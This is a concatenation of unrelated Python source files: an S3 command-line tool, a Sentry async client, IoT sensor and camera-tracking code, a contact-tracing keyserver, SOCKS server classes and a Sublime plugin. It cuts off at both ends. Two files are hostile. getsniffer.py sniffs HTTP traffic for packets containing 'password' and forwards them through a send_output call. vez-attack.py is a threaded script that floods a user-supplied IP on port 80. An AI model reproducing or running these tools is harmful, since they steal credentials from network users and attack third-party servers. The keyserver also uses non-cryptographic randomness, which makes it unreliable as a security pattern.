self.s3, self.client_error = get_s3_client()
@aws_retry
def get_info(self, url):
self.reset_client()
try:
head = self.s3.head_object(Bucket=url.bucket, Key=url.path)
return (
True,
url,
[
(
S3Url(
bucket=url.bucket,
path=url.path,
url=url.url,
local=url.local,
prefix=url.prefix,
content_type=head["ContentType"],
metadata=head["Metadata"],
range=url.range,
),
head["ContentLength"],
)
],
)
except self.client_error as err:
error_code = normalize_client_error(err)
if error_code == 404:
return False, url, ERROR_URL_NOT_FOUND
elif error_code == 403:
return False, url, ERROR_URL_ACCESS_DENIED
else:
raise
@aws_retry
def list_prefix(self, prefix_url, delimiter=""):
self.reset_client()
url_base = "s3://%s/" % prefix_url.bucket
try:
paginator = self.s3.get_paginator("list_objects_v2")
urls = []
for page in paginator.paginate(
Bucket=prefix_url.bucket, Prefix=prefix_url.path, Delimiter=delimiter
):
# note that an url may be both a prefix and an object
# - the trailing slash is significant in S3
if "Contents" in page:
for key in page.get("Contents", []):
url = url_base + key["Key"]
urlobj = S3Url(
url=url,
bucket=prefix_url.bucket,
path=key["Key"],
local=generate_local_path(url),
prefix=prefix_url.url,
)
urls.append((urlobj, key["Size"]))
if "CommonPrefixes" in page:
# we get CommonPrefixes if Delimiter is a non-empty string
for key in page.get("CommonPrefixes", []):
url = url_base + key["Prefix"]
urlobj = S3Url(
url=url,
bucket=prefix_url.bucket,
path=key["Prefix"],
local=None,
prefix=prefix_url.url,
)
urls.append((urlobj, None))
return True, prefix_url, urls
except self.s3.exceptions.NoSuchBucket:
return False, prefix_url, ERROR_URL_NOT_FOUND
except self.client_error as err:
if err.response["Error"]["Code"] in ("AccessDenied", "AllAccessDisabled"):
return False, prefix_url, ERROR_URL_ACCESS_DENIED
else:
raise
# We want to reuse an s3 client instance over multiple operations.
# This is accomplished by op_ functions below.
def op_get_info(urls):
s3 = S3Ops()
return [s3.get_info(url) for url in urls]
def op_list_prefix(prefix_urls):
s3 = S3Ops()
return [s3.list_prefix(prefix) for prefix in prefix_urls]
def op_list_prefix_nonrecursive(prefix_urls):
s3 = S3Ops()
return [s3.list_prefix(prefix, delimiter="/") for prefix in prefix_urls]
def exit(exit_code, url):
if exit_code == ERROR_INVALID_URL:
msg = "Invalid url: %s" % url.url
elif exit_code == ERROR_NOT_FULL_PATH:
msg = "URL not a full path: %s" % url.url
elif exit_code == ERROR_URL_NOT_FOUND:
msg = "URL not found: %s" % url.url
elif exit_code == ERROR_URL_ACCESS_DENIED:
msg = "Access denied to URL: %s" % url.url
elif exit_code == ERROR_WORKER_EXCEPTION:
msg = "Download failed"
elif exit_code == ERROR_VERIFY_FAILED:
msg = "Verification failed for URL %s, local file %s" % (url.url, url.local)
elif exit_code == ERROR_LOCAL_FILE_NOT_FOUND:
msg = "Local file not found: %s" % url
else:
msg = "Unknown error"
print("s3op failed:\n%s" % msg, file=sys.stderr)
sys.exit(exit_code)
def verify_results(urls, verbose=False):
for url, expected in urls:
if verbose:
print("verifying %s, expected %s" % (url, expected), file=sys.stderr)
try:
got = os.stat(url.local).st_size
except OSError:
raise
exit(ERROR_VERIFY_FAILED, url)
if expected != got:
exit(ERROR_VERIFY_FAILED, url)
if url.content_type or url.metadata:
# Verify that we also have a metadata file present
try:
os.stat("%s_meta" % url.local)
except OSError:
exit(ERROR_VERIFY_FAILED, url)
def generate_local_path(url, suffix=None):
# this function generates a safe local file name corresponding to
# an S3 URL. URLs may be longer than maximum file length limit on Linux,
# so we mostly hash the URL but retain the leaf part as a convenience
# feature to ease eyeballing
quoted = url_quote(url)
fname = quoted.split(b"/")[-1].replace(b".", b"_").replace(b"-", b"_")
sha = sha1(quoted).hexdigest()
if suffix:
return u"-".join((sha, fname.decode("utf-8"), suffix))
return u"-".join((sha, fname.decode("utf-8")))
def parallel_op(op, lst, num_workers):
# parallel op divides work equally amongst num_workers
# processes. This is a good strategy if the cost is
# uniform over the units of work, e.g. op_get_info, which
# is a single HEAD request to S3.
#
# This approach is less optimal with op_list_prefix where
# the cost of S3 listing per prefix can vary drastically.
# We could optimize this case by using a worker model with
# a queue, like for downloads but the difference here is
# that we need to return a value, which would require a
# bit more work - something to consider if this turns out
# to be a bottleneck.
if lst:
num = min(len(lst), num_workers)
batch_size = math.ceil(len(lst) / float(num))
batches = []
it = iter(lst)
while True:
batch = list(islice(it, batch_size))
if batch:
batches.append(batch)
else:
break
it = parallel_map(op, batches, max_parallel=num)
for x in chain.from_iterable(it):
yield x
# CLI
@click.group()
def cli():
pass
@cli.command("list", help="List S3 objects")
@click.option(
"--inputs",
type=click.Path(exists=True),
help="Read input prefixes from the given file.",
)
@click.option(
"--num-workers",
default=NUM_WORKERS_DEFAULT,
show_default=True,
help="Number of concurrent connections.",
)
@click.option(
"--recursive/--no-recursive",
default=False,
show_default=True,
help="Download prefixes recursively.",
)
@click.argument("prefixes", nargs=-1)
def lst(prefixes, inputs=None, num_workers=None, recursive=None):
urllist = []
for prefix, _ in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(
url=prefix,
bucket=src.netloc,
path=src.path.lstrip("/"),
local=None,
prefix=prefix,
)
if src.scheme != "s3":
exit(ERROR_INVALID_URL, url)
urllist.append(url)
op = op_list_prefix if recursive else op_list_prefix_nonrecursive
urls = []
for success, prefix_url, ret in parallel_op(op, urllist, num_workers):
if success:
urls.extend(ret)
else:
exit(ret, prefix_url)
for url, size in urls:
if size is None:
print(format_triplet(url.prefix, url.url))
else:
print(format_triplet(url.prefix, url.url, str(size)))
@cli.command(help="Upload files to S3")
@click.option(
"--file",
"files",
type=(click.Path(exists=True), str),
multiple=True,
help="Local file->S3Url pair to upload. " "Can be specified multiple times.",
)
@click.option(
"--filelist",
type=click.Path(exists=True),
help="Read local file -> S3 URL mappings from the given file.",
)
@click.option(
"--num-workers",
default=NUM_WORKERS_DEFAULT,
show_default=True,
help="Number of concurrent connections.",
)
@click.option(
"--verbose/--no-verbose",
default=True,
show_default=True,
help="Print status information on stderr.",
)
@click.option(
"--overwrite/--no-overwrite",
default=True,
show_default=True,
help="Overwrite key if it already exists in S3.",
)
@click.option(
"--listing/--no-listing",
default=False,
show_default=True,
help="Print S3 URLs upload to on stdout.",
)
def put(
files=None,
filelist=None,
num_workers=None,
verbose=None,
overwrite=True,
listing=None,
):
def _files():
for local, url in files:
yield url_unquote(local), url_unquote(url), None, None
if filelist:
for line in open(filelist, mode="rb"):
r = json.loads(line)
local = r["local"]
url = r["url"]
content_type = r.get("content_type", None)
metadata = r.get("metadata", None)
if not os.path.exists(local):
exit(ERROR_LOCAL_FILE_NOT_FOUND, local)
yield local, url, content_type, metadata
def _make_url(local, user_url, content_type, metadata):
src = urlparse(user_url)
url = S3Url(
url=user_url,
bucket=src.netloc,
path=src.path.lstrip("/"),
local=local,
prefix=None,
content_type=content_type,
metadata=metadata,
)
if src.scheme != "s3":
exit(ERROR_INVALID_URL, url)
if not src.path:
exit(ERROR_NOT_FULL_PATH, url)
return url
urls = list(starmap(_make_url, _files()))
ul_op = "upload"
if not overwrite:
ul_op = "info_upload"
sz_results = process_urls(ul_op, urls, verbose, num_workers)
urls = [url for url, sz in zip(urls, sz_results) if sz is not None]
if listing:
for url in urls:
print(format_triplet(url.url))
def _populate_prefixes(prefixes, inputs):
# Returns a tuple: first element is the prefix and second element
# is the optional range (or None if the entire prefix is requested)
if prefixes:
prefixes = [(url_unquote(p), None) for p in prefixes]
else:
prefixes = []
if inputs:
with open(inputs, mode="rb") as f:
for l in f:
s = l.split(b" ")
if len(s) > 1:
prefixes.append(
(url_unquote(s[0].strip()), url_unquote(s[1].strip()))
)
else:
prefixes.append((url_unquote(s[0].strip()), None))
return prefixes
@cli.command(help="Download files from S3")
@click.option(
"--recursive/--no-recursive",
default=False,
show_default=True,
help="Download prefixes recursively.",
)
@click.option(
"--num-workers",
default=NUM_WORKERS_DEFAULT,
show_default=True,
help="Number of concurrent connections.",
)
@click.option(
"--inputs",
type=click.Path(exists=True),
help="Read input prefixes from the given file.",
)
@click.option(
"--verify/--no-verify",
default=True,
show_default=True,
help="Verify that files were loaded correctly.",
)
@click.option(
"--info/--no-info",
default=True,
show_default=True,
help="Return user tags and content-type",
)
@click.option(
"--allow-missing/--no-allow-missing",
default=False,
show_default=True,
help="Do not exit if missing files are detected. " "Implies --verify.",
)
@click.option(
"--verbose/--no-verbose",
default=True,
show_default=True,
help="Print status information on stderr.",
)
@click.option(
"--listing/--no-listing",
default=False,
show_default=True,
help="Print S3 URL -> local file mapping on stdout.",
)
@click.argument("prefixes", nargs=-1)
def get(
prefixes,
recursive=None,
num_workers=None,
inputs=None,
verify=None,
info=None,
allow_missing=None,
verbose=None,
listing=None,
):
# Construct a list of URL (prefix) objects
urllist = []
for prefix, r in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(
url=prefix,
bucket=src.netloc,
path=src.path.lstrip("/"),
local=generate_local_path(prefix),
prefix=prefix,
range=r,
)
if src.scheme != "s3":
exit(ERROR_INVALID_URL, url)
if not recursive and not src.path:
exit(ERROR_NOT_FULL_PATH, url)
urllist.append(url)
# Construct a url->size mapping and get content-type and metadata if needed
op = None
dl_op = "download"
if recursive:
op = op_list_prefix
if verify or verbose or info:
dl_op = "info_download"
if op:
urls = []
# NOTE - we must retain the order of prefixes requested
# and the listing order returned by S3
for success, prefix_url, ret in parallel_op(op, urllist, num_workers):
if success:
urls.extend(ret)
elif ret == ERROR_URL_NOT_FOUND and allow_missing:
urls.append((prefix_url, None))
else:
exit(ret, prefix_url)
else:
# pretend zero size since we don't need it for anything.
# it can't be None though, to make sure the listing below
# works correctly (None denotes a missing file)
urls = [(prefix_url, 0) for prefix_url in urllist]
# exclude the non-existent files from loading
to_load = [url for url, size in urls if size is not None]
sz_results = process_urls(dl_op, to_load, verbose, num_workers)
# We check if there is any access denied
is_denied = [sz == -ERROR_URL_ACCESS_DENIED for sz in sz_results]
if any(is_denied):
# Find the first one to return that as an error
for i, b in enumerate(is_denied):
if b:
exit(ERROR_URL_ACCESS_DENIED, to_load[i])
if not allow_missing:
is_missing = [sz == -ERROR_URL_NOT_FOUND for sz in sz_results]
if any(is_missing):
# Find the first one to return that as an error
for i, b in enumerate(is_missing):
if b:
exit(ERROR_URL_NOT_FOUND, to_load[i])
# Postprocess
if verify:
# Verify only results with an actual size (so actual files)
verify_results(
[
(url, sz)
for url, sz in zip(to_load, sz_results)
if sz != -ERROR_URL_NOT_FOUND
],
verbose=verbose,
)
idx_in_sz = 0
if listing:
for url, _ in urls:
sz = None
if idx_in_sz != len(to_load) and url.url == to_load[idx_in_sz].url:
sz = sz_results[idx_in_sz] if sz_results[idx_in_sz] >= 0 else None
idx_in_sz += 1
if sz is None:
# This means that either the initial url had a None size or
# that after loading, we found a None size
print(format_triplet(url.url))
else:
print(format_triplet(url.prefix, url.url, url.local))
@cli.command(help="Get info about files from S3")
@click.option(
"--num-workers",
default=NUM_WORKERS_DEFAULT,
show_default=True,
help="Number of concurrent connections.",
)
@click.option(
"--inputs",
type=click.Path(exists=True),
help="Read input prefixes from the given file.",
)
@click.option(
"--verbose/--no-verbose",
default=True,
show_default=True,
help="Print status information on stderr.",
)
@click.option(
"--listing/--no-listing",
default=False,
show_default=True,
help="Print S3 URL -> local file mapping on stdout.",
)
@click.argument("prefixes", nargs=-1)
def info(prefixes, num_workers=None, inputs=None, verbose=None, listing=None):
# Construct a list of URL (prefix) objects
urllist = []
for prefix, _ in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(
url=prefix,
bucket=src.netloc,
path=src.path.lstrip("/"),
local=generate_local_path(prefix, suffix="info"),
prefix=prefix,
range=None,
)
if src.scheme != "s3":
exit(ERROR_INVALID_URL, url)
urllist.append(url)
process_urls("info", urllist, verbose, num_workers)
if listing:
for url in urllist:
print(format_triplet(url.prefix, url.url, url.local))
if __name__ == "__main__":
cli(auto_envvar_prefix="S3OP")
|
async.py
|
"""
sentry.client.async
~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from queue import Queue
from sentry.client.base import SentryClient
from threading import Thread, Lock
import atexit
from sentry.client.models import get_client
import os
import time
SENTRY_WAIT_SECONDS = 10
class AsyncSentryClient(SentryClient):
"""This client uses a single background thread to dispatch errors."""
_terminator = object()
def __init__(self):
"""Starts the task thread."""
self.queue = Queue(-1)
self._lock = Lock()
self._thread = None
self.start()
def start(self):
self._lock.acquire()
try:
if not self._thread:
self._thread = Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
finally:
self._lock.release()
atexit.register(main_thread_terminated)
def stop(self, timeout=None):
"""Stops the task thread. Synchronous!"""
self._lock.acquire()
try:
if self._thread:
self.queue.put_nowait(self._terminator)
self._thread.join(timeout=timeout)
self._thread = None
finally:
self._lock.release()
def _target(self):
while True:
record = self.queue.get()
if record is self._terminator:
break
self.send_sync(**record)
def send_sync(self, **kwargs):
super(AsyncSentryClient, self).send(**kwargs)
def send(self, **kwargs):
self.queue.put_nowait(kwargs)
def main_thread_terminated():
client = get_client()
if isinstance(client, AsyncSentryClient):
size = client.queue.qsize()
if size:
print("Sentry attempts to send %s error messages" % size)
print("Waiting up to %s seconds" % SENTRY_WAIT_SECONDS)
if os.name == 'nt':
print("Press Ctrl-Break to quit")
else:
print("Press Ctrl-C to quit")
client.stop(timeout = SENTRY_WAIT_SECONDS)
|
buzzer.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import time
from cisco_deviot.thing import Action, Property
from cisco_grovepi.senor import Sensor
class Buzzer(Sensor):
ON = 1
OFF = 0
def __init__(self, tid, name, pin):
Sensor.__init__(self, tid, name, pin, "buzzer")
self.add_action(Action("turn_on"))
self.add_action(Action("turn_off"))
self.add_action(Action("beep").
add_parameter(Property(name="duration", value=10, range=[10, 100])).
add_parameter(Property(name="interval", value=1, range=[1, 10])))
self.working_thread = None
def turn_on(self):
Sensor.digital_write(self, Buzzer.ON)
def turn_off(self):
Sensor.digital_write(self, Buzzer.OFF)
def beep(self, duration, interval):
if self.working_thread is None:
self.working_thread = threading.Thread(target=Buzzer.__working_function, args=(self, duration, interval))
self.working_thread.daemon = True
self.working_thread.start()
def __working_function(self, duration, interval):
while duration > 0:
self.turn_on()
time.sleep(interval)
duration -= interval
self.turn_off()
time.sleep(interval)
duration -= interval
self.working_thread = None
|
server.py
|
# A dead-simple keyserver implementation in python.
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import *
from Crypto.Cipher import AES
from Crypto.Util import Counter
from enum import Enum
import secrets
import operator
import urllib.parse
import threading
import random
import shutil
import base64
import time
import csv
class settings():
caseid_len = 7 # how many characters long a tek is
caseid_purge_age = 14 # how long caseids last
tek_life = 14 # how long a tek lasts (how many the server should expect)
packed_tek_len = 20 # how long a packed tek is in bytes (4 bytes epoch, 16 bytes tek)
def get_epoch() -> int:
"""gets the unix epoch time"""
return int(time.time())
def derive_enin(epoch : int):
"""gets an enin given an epoch"""
return epoch // (60 * 10)
def unpack_tek(tek : bytes) -> Tuple[int, str]:
"""splits a datapair into an epoch and tek string. can be used for storage."""
return derive_enin(int.from_bytes(tek[:4], "little")), base64.b64encode(tek[4:settings.packed_tek_len]).decode("utf-8")
def pack_tek(epoch : int, tek : str) -> bytes:
"""turns a tek tuple into its binary representation"""
return epoch.to_bytes(4, "little") + base64.b64decode(tek)
def commit_teks(teks : Iterable[Tuple[int, str]]):
"""appends an iterable of teks to the tekfile."""
global tek_file_path
with open(tek_file_path, "a") as tek_file:
tek_file.writelines(map("%d,%s\n".__mod__, teks))
def random_bytes(num : int) -> bytes:
"""generates random bytes of length num"""
return bytes(random.getrandbits(8) for _ in range(num))
class CaseIDType(Enum):
NOT_FOUND = 0
VALID = 1
TOO_OLD = 2
def get_caseids() -> Set[Tuple[int, str]]:
"""returns a set of all caseids"""
return set(iter_caseids())
def commit_caseids(caseids : Set[Tuple[int, str]]):
"""updates caseids"""
global caseid_file_path
with open(caseid_file_path, "w") as caseid_file:
caseid_file.writelines(map("%d,%s\n".__mod__, caseids))
def iter_caseids() -> Iterable[Tuple[int, str]]:
"""iterates over the caseid file"""
global caseid_file_path
caseid_file = open(caseid_file_path, "r")
for line in caseid_file:
row = line.split(",")
yield (int(row[0]), row[1].rstrip())
def burn_caseid(test_caseid: str, caseid_array: Set[Tuple[int, str]]) -> Tuple[CaseIDType, Tuple[int, str]]:
"""validates a caseid against a caseid array. if the caseid is valid, it will return a tuple containing the matching caseid."""
min_age = get_epoch() - settings.caseid_purge_age * 24 * 60 * 60
for epoch, caseid in caseid_array:
if caseid.casefold() == test_caseid.casefold():
if epoch > min_age:
return CaseIDType.VALID, (epoch, caseid)
else:
return CaseIDType.TOO_OLD, (epoch, caseid)
return CaseIDType.NOT_FOUND, None
def gen_caseid(epoch: int, caseid_array: Set[Tuple[int, str]]) -> str:
"""randomly generates a 7-character case id and adds it to the caseid array"""
data = base64.b32encode(secrets.token_bytes(4)).decode("utf-8")[:7]
caseid_array.add((epoch, data))
return data
class TracerServerHandler(BaseHTTPRequestHandler):
def send_headers(self, code : int = 200, headers : dict = { "Content-Type" : "text/html" }) -> None:
"""sends a response code and a dictionary of headers"""
self.send_response(code)
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
def get_query(self, default : dict = {}) -> dict:
"""gets the query string as a dictionary"""
return dict([*default.items()] + [*urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query, False).items()])
def do_GET(self):
"""returns all of the valid binary TEKs"""
global tek_file_path
self.send_headers()
query = self.get_query({
"oldest" : [0]
})
oldest_age = int(query["oldest"][0])
with open(tek_file_path, "r") as tek_file:
tek_reader = csv.reader(tek_file)
for row in tek_reader:
epoch = int(row[0])
if epoch >= oldest_age:
self.wfile.write(pack_tek(epoch, row[1]))
def do_POST(self):
"""accepts a body consisting of a CaseID and 14 binary TEKs and saves them to a pending TEK array if the CaseID is valid."""
global active_caseid_array, pending_teks
self.send_headers()
content_len = int(self.headers["Content-Length"])
content_len -= settings.caseid_len
if content_len // settings.packed_tek_len == settings.tek_life:
caseid = self.rfile.read(settings.caseid_len).decode("utf-8")
ret, match_caseid = burn_caseid(caseid, active_caseid_array)
if ret == CaseIDType.VALID:
active_caseid_array.remove(match_caseid)
for i in range(settings.tek_life):
chunk = self.rfile.read(settings.packed_tek_len)
if not chunk: break
tek = unpack_tek(chunk)
if tek[0]: pending_teks.append(tek)
self.wfile.write(b"ok")
return
elif burn_caseid == CaseIDType.TOO_OLD:
self.wfile.write(b"expired")
return
self.wfile.write(b"invalid")
def log_message(self, format, *args):
return
tek_file_path = "tekfile.csv"
caseid_file_path = "caseid.csv"
active_caseid_array = get_caseids()
pending_teks = []
http_server = HTTPServer(("", 80), TracerServerHandler)
server_thread = threading.Thread(target=http_server.serve_forever, name="tracer webserver")
server_thread.setDaemon(True)
server_thread.start()
def reload_changes():
global pending_teks, active_caseid_array, sync_thread
commit_teks(pending_teks)
pending_teks.clear()
commit_caseids(active_caseid_array)
sync_thread = threading.Timer(sync_thread.interval, sync_thread.function)
sync_thread.setDaemon(True)
sync_thread.start()
sync_thread = threading.Timer(5.0, reload_changes)
sync_thread.setDaemon(True)
sync_thread.start()
def shutdown(cmd):
global server_thread, sync_thread
server_thread._stop()
sync_thread.cancel()
raise SystemExit
def reload_caseid_array() -> int:
global active_caseid_array
active_caseid_array = get_caseids()
return len(active_caseid_array)
def commit_pending_teks(cmd):
global pending_teks
commit_teks(pending_teks)
out = "commited %d teks" % len(pending_teks)
pending_teks.clear()
return out
command_list = {
"gen_caseid": lambda cmd: "\n".join("%d: generated key %s" % (i, gen_caseid(get_epoch(), active_caseid_array)) for i in range(int(cmd[1]) if cmd[1:] else 1)),
"list_caseid": lambda cmd: "\n".join(map("epoch: %d\tcaseid: %s".__mod__, active_caseid_array)),
"get_caseid": lambda cmd: reload_caseid_array(),
"commit_caseid": lambda cmd: commit_caseids(active_caseid_array),
"commit_teks": commit_pending_teks,
"list_teks": lambda cmd: "\n".join(map("epoch: %d\ttek: %s".__mod__, pending_teks)),
"help": lambda cmd: "available commands:\n\t"+"\n\t".join(command_list.keys()),
"exit": shutdown
}
while True:
userin = input("> ")
parsedcmd = userin.split()
command = parsedcmd[0] if parsedcmd else "help"
if command in command_list:
print(command_list[command](parsedcmd))
else: print("unknown command!")
|
getsniffer.py
|
from scapy.all import *
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import re
from base64 import b64decode
from threading import Thread
from time import sleep
from random import randint
import time
import utils
def packet_callback(packet):
global BUFFER
pkt = str(packet[TCP].payload)
if packet[IP].dport == 80:
if str(bytes(packet[TCP].payload)) == "":
pass
else:
if "password" in str(bytes(packet[TCP].payload)):
sleep(2)
now = time.strftime("%c")
utils.send_output("{{getrequestauth}}" + str(bytes(packet[TCP].payload)) + "{{{" + str(time.strftime("%c")))
def start_sniffer():
sniff(filter="tcp", prn=packet_callback, store=0)
def run():
thread0 = Thread(target = start_sniffer)
thread0.start()
|
servers.py
|
import ssl
import socket
import threading
try:
import socketserver
except ImportError:
import SocketServer as socketserver
try:
from queue import Queue
except ImportError:
from Queue import Queue
socketserver.TCPServer.allow_reuse_address = True
TIME_OUT = 30
POOL_SIZE = 50
class ThreadPoolMixIn(socketserver.ThreadingMixIn):
"""Thread pool mixin"""
def serve_forever(self, pool_size=POOL_SIZE):
self.requests = Queue(pool_size)
for x in range(pool_size):
t = threading.Thread(target = self.process_request_thread)
t.setDaemon(1)
t.start()
while True:
self.handle_request()
self.server_close()
def process_request_thread(self):
while True:
socketserver.ThreadingMixIn.process_request_thread(self, *self.requests.get())
def handle_request(self):
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
self.requests.put((request, client_address))
class SecureTCPServer(socketserver.TCPServer):
"""TCP server with SSL"""
SYSTEMD_FIRST_SOCKET_FD = 3
def __init__(self, pem_path, server_address, handler_class, with_systemd=False):
socketserver.BaseServer.__init__(self, server_address, handler_class)
af, socktype, proto, canonname, sa = socket.getaddrinfo(
self.server_address[0], self.server_address[1], 0, socket.SOCK_STREAM)[0]
if not with_systemd:
sock = socket.socket(af, socktype, proto)
else:
sock = socket.fromfd(self.SYSTEMD_FIRST_SOCKET_FD, af, socktype)
#sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
# Don't do handshake on connect for ssl (which will block http://bugs.python.org/issue1251)
self.socket = ssl.wrap_socket(sock, pem_path, pem_path, server_side=True, do_handshake_on_connect=False)
if not with_systemd:
self.server_bind()
self.server_activate()
class Socks5Server(socketserver.ThreadingMixIn, socketserver.TCPServer):
"""Threading Socks5 server"""
pass
class TPSocks5Server(ThreadPoolMixIn, socketserver.TCPServer):
"""Thread Pool Socks5 server"""
pass
class SecureSocks5Server(socketserver.ThreadingMixIn, SecureTCPServer):
"""Secure Socks5 server"""
pass
class TPSecureSocks5Server(ThreadPoolMixIn, SecureTCPServer):
"""Thread Pool Secure Socks5 server"""
pass
class PingServer(ThreadPoolMixIn, socketserver.UDPServer):
"""UDP Ping server"""
pass
class DNSServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
"""UDP DNS Proxy"""
pass
class RPCServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
"""UDP RPC Server"""
pass
# Test server
# svr = PingServer(('0.0.0.0', 8888), PingHandler)
# svr.serve_forever(5)
|
manager.py
|
import logging
from multiprocessing import Value, Process, Manager
import time
import pantilthat as pth
import signal
import sys
import numpy as np
from rpi_deep_pantilt.detect.camera import PiCameraStream
from rpi_deep_pantilt.detect.ssd_mobilenet_v3_coco import SSDMobileNet_V3_Small_Coco_PostProcessed, SSDMobileNet_V3_Coco_EdgeTPU_Quant
from rpi_deep_pantilt.control.pid import PIDController
logging.basicConfig()
LOGLEVEL = logging.getLogger().getEffectiveLevel()
RESOLUTION = (320, 320)
SERVO_MIN = -90
SERVO_MAX = 90
CENTER = (
RESOLUTION[0] // 2,
RESOLUTION[1] // 2
)
# function to handle keyboard interrupt
def signal_handler(sig, frame):
# print a status message
print("[INFO] You pressed `ctrl + c`! Exiting...")
# disable the servos
pth.servo_enable(1, False)
pth.servo_enable(2, False)
# exit
sys.exit()
def run_detect(center_x, center_y, labels, edge_tpu):
if edge_tpu:
model = SSDMobileNet_V3_Coco_EdgeTPU_Quant()
else:
model = SSDMobileNet_V3_Small_Coco_PostProcessed()
capture_manager = PiCameraStream(resolution=RESOLUTION)
capture_manager.start()
capture_manager.start_overlay()
label_idxs = model.label_to_category_index(labels)
start_time = time.time()
fps_counter = 0
while not capture_manager.stopped:
if capture_manager.frame is not None:
frame = capture_manager.read()
prediction = model.predict(frame)
if not len(prediction.get('detection_boxes')):
continue
if any(item in label_idxs for item in prediction.get('detection_classes')):
tracked = (
(i, x) for i, x in
enumerate(prediction.get('detection_classes'))
if x in label_idxs
)
tracked_idxs, tracked_classes = zip(*tracked)
track_target = prediction.get('detection_boxes')[
tracked_idxs[0]]
# [ymin, xmin, ymax, xmax]
y = int(
RESOLUTION[1] - ((np.take(track_target, [0, 2])).mean() * RESOLUTION[1]))
center_y.value = y
x = int(
RESOLUTION[0] - ((np.take(track_target, [1, 3])).mean() * RESOLUTION[0]))
center_x.value = x
display_name = model.category_index[tracked_classes[0]]['name']
logging.info(
f'Tracking {display_name} center_x {x} center_y {y}')
overlay = model.create_overlay(frame, prediction)
capture_manager.overlay_buff = overlay
if LOGLEVEL is logging.DEBUG and (time.time() - start_time) > 1:
fps_counter += 1
fps = fps_counter / (time.time() - start_time)
logging.debug(f'FPS: {fps}')
fps_counter = 0
start_time = time.time()
def in_range(val, start, end):
# determine the input vale is in the supplied range
return (val >= start and val <= end)
def set_servos(pan, tilt):
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
while True:
pan_angle = -1 * pan.value
tilt_angle = tilt.value
# if the pan angle is within the range, pan
if in_range(pan_angle, SERVO_MIN, SERVO_MAX):
pth.pan(pan_angle)
else:
logging.info(f'pan_angle not in range {pan_angle}')
if in_range(tilt_angle, SERVO_MIN, SERVO_MAX):
pth.tilt(tilt_angle)
else:
logging.info(f'tilt_angle not in range {tilt_angle}')
def pid_process(output, p, i, d, box_coord, origin_coord, action):
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
# create a PID and initialize it
p = PIDController(p.value, i.value, d.value)
p.reset()
# loop indefinitely
while True:
error = origin_coord - box_coord.value
output.value = p.update(error)
# logging.info(f'{action} error {error} angle: {output.value}')
# ('person',)
#('orange', 'apple', 'sports ball')
def pantilt_process_manager(
edge_tpu=False,
labels=('person',)
):
pth.servo_enable(1, True)
pth.servo_enable(2, True)
with Manager() as manager:
# set initial bounding box (x, y)-coordinates to center of frame
center_x = manager.Value('i', 0)
center_y = manager.Value('i', 0)
center_x.value = RESOLUTION[0] // 2
center_y.value = RESOLUTION[1] // 2
# pan and tilt angles updated by independent PID processes
pan = manager.Value('i', 0)
tilt = manager.Value('i', 0)
# PID gains for panning
pan_p = manager.Value('f', 0.05)
# 0 time integral gain until inferencing is faster than ~50ms
pan_i = manager.Value('f', 0.1)
pan_d = manager.Value('f', 0)
# PID gains for tilting
tilt_p = manager.Value('f', 0.15)
# 0 time integral gain until inferencing is faster than ~50ms
tilt_i = manager.Value('f', 0.2)
tilt_d = manager.Value('f', 0)
detect_processr = Process(target=run_detect,
args=(center_x, center_y, labels, edge_tpu))
pan_process = Process(target=pid_process,
args=(pan, pan_p, pan_i, pan_d, center_x, CENTER[0], 'pan'))
tilt_process = Process(target=pid_process,
args=(tilt, tilt_p, tilt_i, tilt_d, center_y, CENTER[1], 'tilt'))
servo_process = Process(target=set_servos, args=(pan, tilt))
detect_processr.start()
pan_process.start()
tilt_process.start()
servo_process.start()
detect_processr.join()
pan_process.join()
tilt_process.join()
servo_process.join()
if __name__ == '__main__':
pantilt_process_manager()
|
vez-attack.py
|
import time as v
import socket
import threading
print "\n"*1000
v.sleep(2)
print """ \033[1;36;50m
__ __ _____ _____ _ _____ _____ _ ____ _ __
\ \ / / | ____| |__ / / \ |_ _| |_ _| / \ / ___| | |/ /
\ \ / / | _| / / / _ \ | | | | / _ \ | | | ' /
\ V / | |___ / /_ / ___ \ | | | | / ___ \ | |___ | . \
\_/ |_____| /____| /_/ \_\ |_| |_| /_/ \_\ \____| |_|\_\
"""
v.sleep(1.5)
print """By VipRs ______ >>Python2.7
|______| """
v.sleep(1)
target =raw_input("Ip>>")
port = 80
print "port 80..."
v.sleep(2)
def xxx():
x = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
x.connect((target, port))
x.sendto(("GET /{target} HTTP/1.1\rboot off da skid :v\n").encode("ascii"), (target, port))
x.close()
ix = 0
while ix != 100:
v.sleep(0.5)
thread = threading.Thread(target=xxx)
thread.start()
print "Socket Sent!"
|
main.py
|
import sublime
import sublime_plugin
import webbrowser
import urllib
import re
import os
import sys
import shutil
import zipfile
import json
import pprint
import time
import xml
import urllib.request
from . import requests
from . import processor
from . import context
from . import util
from .salesforce.lib import xmlformatter
from .salesforce.lib.jsontoapex import JSONConverter
from .salesforce.lib.panel import Printer
from .salesforce import xmltodict
from .salesforce import message
class RemoveComments(sublime_plugin.TextCommand):
def run(self, edit):
comments = self.view.find_by_selector('comment')
for region in reversed(comments):
region = self.view.full_line(region)
self.view.erase(edit, region)
